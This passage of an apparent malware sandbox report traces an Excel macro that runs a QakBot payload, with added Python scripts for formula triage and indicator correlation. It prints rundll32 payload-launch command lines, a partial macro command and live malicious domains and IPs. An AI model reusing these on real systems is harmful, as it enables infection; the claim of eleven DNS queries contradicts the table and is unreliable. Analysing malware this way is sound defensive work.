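def split_top_level(text, sep):
    """Split text on sep wherever sep is outside quotes and parentheses."""
    parts, depth, in_str, start = [], 0, False, 0
    for i, ch in enumerate(text):
        if ch == '"':
            in_str = not in_str
        elif in_str:
            continue
        elif ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        elif ch == sep and depth == 0:
            parts.append(text[start:i])
            start = i + 1
    parts.append(text[start:])
    return [p.strip() for p in parts]


def split_formulas(cell_text):
    """Turn '=A()=B()=C()' into ['=A()', '=B()', '=C()']."""
    return ["=" + p for p in split_top_level(cell_text, "=") if p]


def func_name(formula):
    m = re.match(r"=\s*([A-Z0-9_.]+)\s*\(", formula)
    return m.group(1) if m else None


def is_noise(formula):
    """Padding: a single call to a harmless math function with numeric arguments."""
    name = func_name(formula)
    return name in NOISE_FUNCS and re.fullmatch(
        r"=%s\([\d,]*\)" % re.escape(name), formula) is not None


def args(formula):
    """Top-level argument list of a formula such as =CALL(a,b,c)."""
    inner = formula[formula.index("(") + 1:formula.rindex(")")]
    return split_top_level(inner, ",")


def concat_skeleton(expr):
    """What an '&' concatenation reveals without the workbook: literals are kept,
    cell references become <ref> placeholders."""
    out = []
    for piece in split_top_level(expr, "&"):
        if len(piece) >= 2 and piece[0] == piece[-1] == '"':
            out.append(piece[1:-1])
        else:
            out.append("<%s>" % piece)
    return "".join(out)


def triage(line):
    """Drop the padding and return (function, [argument skeletons]) for the rest."""
    kept = []
    for f in split_formulas(unquote_csv(line)):
        if is_noise(f):
            continue
        if "(" not in f:
            kept.append((None, [f]))
            continue
        kept.append((func_name(f), [concat_skeleton(a) for a in args(f)]))
    return kept


if __name__ == "__main__":
    for name, skeleton in triage(SAMPLE_EXEC_LINE):
        print(name, skeleton)
```

Run on the EXEC cell, the two command lines collapse to `<Doc3!BB22><Doc3!BB23><Doc3!BB24><Doc3!BB30>2 <Doc3!BC17><Doc3!BD31>lRegisterServer` and the same with `<Doc3!BC18>1`, which makes the dependency on the unprinted cells explicit: the next step is to pull those cells from the workbook, not to guess at them.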

                                                                                                                                                          Network Behavior

                                                                                                                                                          Network Port Distribution

                                                                                                                                                          TCP Packets

All TCP packets below belong to a single connection, 192.168.2.4:49729 to 192.185.39.58:443.

Timestamp                              Src Port  Dst Port  Source IP      Dest IP
May 12, 2021 13:32:31.075166941 CEST   49729     443       192.168.2.4    192.185.39.58
May 12, 2021 13:32:31.239478111 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:31.239664078 CEST   49729     443       192.168.2.4    192.185.39.58
May 12, 2021 13:32:31.240961075 CEST   49729     443       192.168.2.4    192.185.39.58
May 12, 2021 13:32:31.405143023 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:31.429488897 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:31.429522991 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:31.429538965 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:31.429629087 CEST   49729     443       192.168.2.4    192.185.39.58
May 12, 2021 13:32:31.429697037 CEST   49729     443       192.168.2.4    192.185.39.58
May 12, 2021 13:32:31.448086977 CEST   49729     443       192.168.2.4    192.185.39.58
May 12, 2021 13:32:31.611423969 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:31.611601114 CEST   49729     443       192.168.2.4    192.185.39.58
May 12, 2021 13:32:31.612904072 CEST   49729     443       192.168.2.4    192.185.39.58
May 12, 2021 13:32:31.820620060 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:31.859360933 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:31.859380960 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:31.859396935 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:31.859414101 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:31.859431028 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:31.859447956 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:31.859462023 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:31.859482050 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:31.859502077 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:31.859519958 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:31.859587908 CEST   49729     443       192.168.2.4    192.185.39.58
May 12, 2021 13:32:31.859625101 CEST   49729     443       192.168.2.4    192.185.39.58
May 12, 2021 13:32:32.025099993 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.025116920 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.025130033 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.025141954 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.025218010 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.025229931 CEST   49729     443       192.168.2.4    192.185.39.58
May 12, 2021 13:32:32.025239944 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.025263071 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.025289059 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.025311947 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.025321007 CEST   49729     443       192.168.2.4    192.185.39.58
May 12, 2021 13:32:32.025336027 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.025357962 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.025378942 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.025398016 CEST   49729     443       192.168.2.4    192.185.39.58
May 12, 2021 13:32:32.025429010 CEST   49729     443       192.168.2.4    192.185.39.58
May 12, 2021 13:32:32.025430918 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.025458097 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.025486946 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.025495052 CEST   49729     443       192.168.2.4    192.185.39.58
May 12, 2021 13:32:32.025509119 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.025532007 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.025552034 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.025558949 CEST   49729     443       192.168.2.4    192.185.39.58
May 12, 2021 13:32:32.025578976 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.025604010 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.025612116 CEST   49729     443       192.168.2.4    192.185.39.58
May 12, 2021 13:32:32.025656939 CEST   49729     443       192.168.2.4    192.185.39.58
May 12, 2021 13:32:32.189590931 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.189629078 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.189651966 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.189668894 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.189740896 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.189766884 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.189785004 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.189802885 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.189819098 CEST   49729     443       192.168.2.4    192.185.39.58
May 12, 2021 13:32:32.189825058 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.189848900 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.189873934 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.189894915 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.189905882 CEST   49729     443       192.168.2.4    192.185.39.58
May 12, 2021 13:32:32.189918995 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.189941883 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.189961910 CEST   49729     443       192.168.2.4    192.185.39.58
May 12, 2021 13:32:32.189964056 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.189985037 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.189989090 CEST   49729     443       192.168.2.4    192.185.39.58
May 12, 2021 13:32:32.190010071 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.190032005 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.190052032 CEST   49729     443       192.168.2.4    192.185.39.58
May 12, 2021 13:32:32.190053940 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.190077066 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.190102100 CEST   49729     443       192.168.2.4    192.185.39.58
May 12, 2021 13:32:32.190103054 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.190126896 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.190135956 CEST   49729     443       192.168.2.4    192.185.39.58
May 12, 2021 13:32:32.190149069 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.190170050 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.190179110 CEST   49729     443       192.168.2.4    192.185.39.58
May 12, 2021 13:32:32.190192938 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.190215111 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.190218925 CEST   49729     443       192.168.2.4    192.185.39.58
May 12, 2021 13:32:32.190238953 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.190239906 CEST   49729     443       192.168.2.4    192.185.39.58
May 12, 2021 13:32:32.190264940 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.190274954 CEST   49729     443       192.168.2.4    192.185.39.58
May 12, 2021 13:32:32.190289974 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.190301895 CEST   49729     443       192.168.2.4    192.185.39.58
May 12, 2021 13:32:32.190315008 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.190325975 CEST   49729     443       192.168.2.4    192.185.39.58
May 12, 2021 13:32:32.190339088 CEST   443       49729     192.185.39.58  192.168.2.4
May 12, 2021 13:32:32.190351963 CEST   49729     443       192.168.2.4    192.185.39.58

                                                                                                                                                          UDP Packets

All UDP packets are DNS exchanges between 192.168.2.4 and the resolver 8.8.8.8: eleven queries and eleven responses, matched by the ephemeral source port; the two queries at 13:32:25 are in flight at the same time.

Timestamp                              Src Port  Dst Port  Source IP    Dest IP
May 12, 2021 13:32:11.700754881 CEST   64646     53        192.168.2.4  8.8.8.8
May 12, 2021 13:32:11.757498026 CEST   53        64646     8.8.8.8      192.168.2.4
May 12, 2021 13:32:12.278656960 CEST   65298     53        192.168.2.4  8.8.8.8
May 12, 2021 13:32:12.337564945 CEST   53        65298     8.8.8.8      192.168.2.4
May 12, 2021 13:32:12.353760958 CEST   59123     53        192.168.2.4  8.8.8.8
May 12, 2021 13:32:12.430588961 CEST   53        59123     8.8.8.8      192.168.2.4
May 12, 2021 13:32:12.962347031 CEST   54531     53        192.168.2.4  8.8.8.8
May 12, 2021 13:32:13.011122942 CEST   53        54531     8.8.8.8      192.168.2.4
May 12, 2021 13:32:16.957289934 CEST   49714     53        192.168.2.4  8.8.8.8
May 12, 2021 13:32:17.006031990 CEST   53        49714     8.8.8.8      192.168.2.4
May 12, 2021 13:32:17.961410999 CEST   58028     53        192.168.2.4  8.8.8.8
May 12, 2021 13:32:18.010879040 CEST   53        58028     8.8.8.8      192.168.2.4
May 12, 2021 13:32:19.583864927 CEST   53097     53        192.168.2.4  8.8.8.8
May 12, 2021 13:32:19.632714033 CEST   53        53097     8.8.8.8      192.168.2.4
May 12, 2021 13:32:19.727679014 CEST   49257     53        192.168.2.4  8.8.8.8
May 12, 2021 13:32:19.790978909 CEST   53        49257     8.8.8.8      192.168.2.4
May 12, 2021 13:32:24.190608978 CEST   62389     53        192.168.2.4  8.8.8.8
May 12, 2021 13:32:24.242945910 CEST   53        62389     8.8.8.8      192.168.2.4
May 12, 2021 13:32:25.419805050 CEST   49910     53        192.168.2.4  8.8.8.8
May 12, 2021 13:32:25.475008965 CEST   55854     53        192.168.2.4  8.8.8.8
May 12, 2021 13:32:25.496903896 CEST   53        49910     8.8.8.8      192.168.2.4
May 12, 2021 13:32:25.526416063 CEST   53        55854     8.8.8.8      192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:25.992902994 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:26.068509102 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:26.986114025 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:27.048033953 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:28.002069950 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:28.062403917 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:30.039849043 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:30.091464996 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:31.023514032 CEST6315353192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:31.072433949 CEST53631538.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:31.249562979 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:31.299894094 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.471741915 CEST5370053192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:32.521842957 CEST53537008.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:32.547735929 CEST5172653192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:32.610028028 CEST53517268.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:33.344405890 CEST5679453192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:33.393066883 CEST53567948.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:34.123672009 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:34.201133966 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:37.946820021 CEST5653453192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:37.998413086 CEST53565348.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:39.252321959 CEST5662753192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:39.300998926 CEST53566278.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:40.682939053 CEST5662153192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:40.731926918 CEST53566218.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:42.145760059 CEST6311653192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:42.199048042 CEST53631168.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:43.515748024 CEST6407853192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:43.566895962 CEST53640788.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:44.717510939 CEST6480153192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:44.767641068 CEST53648018.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:45.602051973 CEST6172153192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:45.661864996 CEST53617218.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:46.787492990 CEST5125553192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:46.844712973 CEST53512558.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:47.312530041 CEST6152253192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:47.374838114 CEST53615228.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:48.122045040 CEST5233753192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:48.174633026 CEST53523378.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:49.380045891 CEST5504653192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:49.428841114 CEST53550468.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:32:55.634301901 CEST4961253192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:32:55.694555998 CEST53496128.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:33:06.519836903 CEST4928553192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:33:06.583713055 CEST53492858.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:33:08.224392891 CEST5060153192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:33:08.281712055 CEST53506018.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:33:32.174385071 CEST6087553192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:33:32.250258923 CEST53608758.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:33:35.221759081 CEST5644853192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:33:35.280333042 CEST53564488.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:33:39.987410069 CEST5917253192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:33:40.055053949 CEST53591728.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:34:15.173784018 CEST6242053192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:34:15.245922089 CEST53624208.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:34:15.844187021 CEST6057953192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:34:15.896749973 CEST53605798.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:34:23.945249081 CEST5018353192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:34:24.064714909 CEST53501838.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:34:25.481246948 CEST6153153192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:34:25.538827896 CEST53615318.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:34:29.043479919 CEST4922853192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:34:29.102607012 CEST53492288.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:34:30.249735117 CEST5979453192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:34:30.373637915 CEST53597948.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:34:31.074817896 CEST5591653192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:34:31.133188963 CEST53559168.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:34:31.924369097 CEST5275253192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:34:31.984452963 CEST53527528.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:34:32.433563948 CEST6054253192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:34:32.493552923 CEST53605428.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:34:33.583031893 CEST6068953192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:34:33.640203953 CEST53606898.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:34:33.918680906 CEST6420653192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:34:33.990600109 CEST53642068.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:34:34.687747955 CEST5090453192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:34:34.736524105 CEST53509048.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:34:35.269757986 CEST5752553192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:34:35.337656021 CEST53575258.8.8.8192.168.2.4
                                                                                                                                                          May 12, 2021 13:34:47.825035095 CEST5381453192.168.2.48.8.8.8
                                                                                                                                                          May 12, 2021 13:34:47.883009911 CEST53538148.8.8.8192.168.2.4

DNS Queries

Timestamp                              Source IP    Dest IP  Trans ID  OP Code             Name                   Type            Class
May 12, 2021 13:32:31.023514032 CEST   192.168.2.4  8.8.8.8  0xe7e0    Standard query (0)  signifysystem.com      A (IP address)  IN (0x0001)
May 12, 2021 13:32:32.547735929 CEST   192.168.2.4  8.8.8.8  0xf80c    Standard query (0)  fcventasyservicios.cl  A (IP address)  IN (0x0001)

DNS Answers

Timestamp                              Source IP  Dest IP      Trans ID  Reply Code    Name                      CName                         Address         Type                    Class
May 12, 2021 13:32:31.072433949 CEST   8.8.8.8    192.168.2.4  0xe7e0    No error (0)  signifysystem.com         -                             192.185.39.58   A (IP address)          IN (0x0001)
May 12, 2021 13:32:32.610028028 CEST   8.8.8.8    192.168.2.4  0xf80c    No error (0)  fcventasyservicios.cl     -                             192.185.32.232  A (IP address)          IN (0x0001)
May 12, 2021 13:34:15.245922089 CEST   8.8.8.8    192.168.2.4  0x13c3    No error (0)  prda.aadg.msidentity.com  www.tm.a.prd.aadg.akadns.net  -               CNAME (Canonical name)  IN (0x0001)

HTTPS Packets

Timestamp                              Source IP       Source Port  Dest IP      Dest Port
May 12, 2021 13:32:31.429538965 CEST   192.185.39.58   443          192.168.2.4  49729
  Certificate chain (Subject | Issuer | Not Before | Not After):
    CN=cpcontacts.signifysystem.com | CN=R3, O=Let's Encrypt, C=US | Thu Apr 01 17:00:25 CEST 2021 | Wed Jun 30 17:00:25 CEST 2021
    CN=R3, O=Let's Encrypt, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Oct 07 21:21:40 CEST 2020 | Wed Sep 29 21:21:40 CEST 2021
  JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0
  JA3 SSL Client Digest: 37f463bf4616ecd445d4a1937da06e19

May 12, 2021 13:32:32.934375048 CEST   192.185.32.232  443          192.168.2.4  49734
  Certificate chain (Subject | Issuer | Not Before | Not After):
    CN=mail.fcventasyservicios.cl | CN=R3, O=Let's Encrypt, C=US | Tue Mar 16 13:01:12 CET 2021 | Mon Jun 14 14:01:12 CEST 2021
    CN=R3, O=Let's Encrypt, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Oct 07 21:21:40 CEST 2020 | Wed Sep 29 21:21:40 CEST 2021
  JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0
  JA3 SSL Client Digest: 37f463bf4616ecd445d4a1937da06e19
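The two A answers above resolve to exactly the two server IPs that then appear in the HTTPS table, and both TLS sessions carry the same JA3 string and digest. The JA3 values describe the ClientHello sent from 192.168.2.4, even though the row is logged in the server-to-client direction (the row is the server's certificate message). The Python below is an added example, not part of the sandbox report: it transcribes those rows, recomputes the digest column as the MD5 of the fingerprint column, splits the fingerprint into its five fields, and links each TLS server back to the DNS name that produced its IP. The dict layout, the field names and the "leaf CN sits under the queried name" heuristic are assumptions of the example; the report shows subject CNs but no SAN lists, so that heuristic is a triage hint, not certificate validation.

```python
import hashlib

# Rows transcribed from the DNS Answers and HTTPS Packets tables above. The
# dict layout is constructed for this example; the values are the report's.
DNS_ANSWERS = [
    {"txid": 0xE7E0, "name": "signifysystem.com", "cname": None,
     "address": "192.185.39.58", "rtype": "A"},
    {"txid": 0xF80C, "name": "fcventasyservicios.cl", "cname": None,
     "address": "192.185.32.232", "rtype": "A"},
    {"txid": 0x13C3, "name": "prda.aadg.msidentity.com",
     "cname": "www.tm.a.prd.aadg.akadns.net", "address": None, "rtype": "CNAME"},
]

# Both TLS sessions in the report carry the same JA3 string and digest.
REPORT_JA3 = ("771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-"
              "49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0")
REPORT_JA3_DIGEST = "37f463bf4616ecd445d4a1937da06e19"

TLS_SESSIONS = [
    {"server_ip": "192.185.39.58", "client_port": 49729,
     "chain": ["CN=cpcontacts.signifysystem.com", "CN=R3, O=Let's Encrypt, C=US"],
     "ja3": REPORT_JA3, "ja3_digest": REPORT_JA3_DIGEST},
    {"server_ip": "192.185.32.232", "client_port": 49734,
     "chain": ["CN=mail.fcventasyservicios.cl", "CN=R3, O=Let's Encrypt, C=US"],
     "ja3": REPORT_JA3, "ja3_digest": REPORT_JA3_DIGEST},
]


def ja3_digest(ja3: str) -> str:
    """The JA3 digest column is the MD5 of the JA3 fingerprint string."""
    return hashlib.md5(ja3.encode("ascii")).hexdigest()


def parse_ja3(ja3: str) -> dict:
    """Split a JA3 string into version, ciphers, extensions, curves, point formats."""
    version, ciphers, extensions, curves, point_formats = ja3.split(",")

    def ints(field):
        return [int(x) for x in field.split("-")] if field else []

    return {"version": int(version), "ciphers": ints(ciphers),
            "extensions": ints(extensions), "curves": ints(curves),
            "point_formats": ints(point_formats)}


def cn_of(dn: str):
    """Pull the CN out of a comma-separated distinguished name."""
    for rdn in dn.split(","):
        key, _, value = rdn.strip().partition("=")
        if key == "CN":
            return value
    return None


def cn_under(cn: str, qname: str) -> bool:
    return cn == qname or cn.endswith("." + qname)


def correlate(dns_answers, tls_sessions):
    """Link each TLS session back to the DNS name(s) that resolved to its server IP."""
    names_by_ip = {}
    for ans in dns_answers:
        if ans["address"]:
            names_by_ip.setdefault(ans["address"], []).append(ans["name"])
    iocs = []
    for sess in tls_sessions:
        queried = names_by_ip.get(sess["server_ip"], [])
        leaf = cn_of(sess["chain"][0])
        issuer = cn_of(sess["chain"][1]) if len(sess["chain"]) > 1 else None
        iocs.append({
            "ip": sess["server_ip"],
            "queried_names": queried,
            "leaf_cn": leaf,
            "issuer_cn": issuer,
            # heuristic only: the report lists the subject CN, not the SAN list
            "cn_under_queried_name": leaf is not None
                                     and any(cn_under(leaf, q) for q in queried),
            "ja3_digest_consistent": ja3_digest(sess["ja3"]) == sess["ja3_digest"],
        })
    return iocs


if __name__ == "__main__":
    for ioc in correlate(DNS_ANSWERS, TLS_SESSIONS):
        print(ioc)
    print(parse_ja3(REPORT_JA3))
```

The CNAME answer for prda.aadg.msidentity.com has no matching row in the DNS Queries table and no address, so it never links to a session; a real triage script would keep such answers aside rather than drop them, since they show which of the roughly fifty UDP/53 exchanges in the packet list the sandbox chose not to itemise.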

Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 13:32:23
Start date: 12/05/2021
Path: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase: 0xf30000
File size: 27110184 bytes
MD5 hash: 5D6638F2C8F8571C593999C58866007E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 13:32:32
Start date: 12/05/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32 ..\ritofm.cvm,DllRegisterServer
Imagebase: 0x10f0000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: QakBot, Description: QakBot Payload, Source: 00000001.00000003.708454273.00000000049F0000.00000004.00000001.sdmp, Author: kevoreilly
Reputation: high

General

Start time: 13:32:51
Start date: 12/05/2021
Path: C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\explorer.exe
Imagebase: 0x1080000
File size: 3611360 bytes
MD5 hash: 166AB1B9462E5C1D6D18EC5EC0B6A5F7
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: QakBot, Description: QakBot Payload, Source: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Author: kevoreilly
Reputation: high

                                                                                                                                                          General

                                                                                                                                                          Start time:13:32:51
                                                                                                                                                          Start date:12/05/2021
                                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:rundll32 ..\ritofm.cvm1,DllRegisterServer
                                                                                                                                                          Imagebase:0x10f0000
                                                                                                                                                          File size:61952 bytes
                                                                                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Start time:13:32:51
                                                                                                                                                          Start date:12/05/2021
                                                                                                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):true
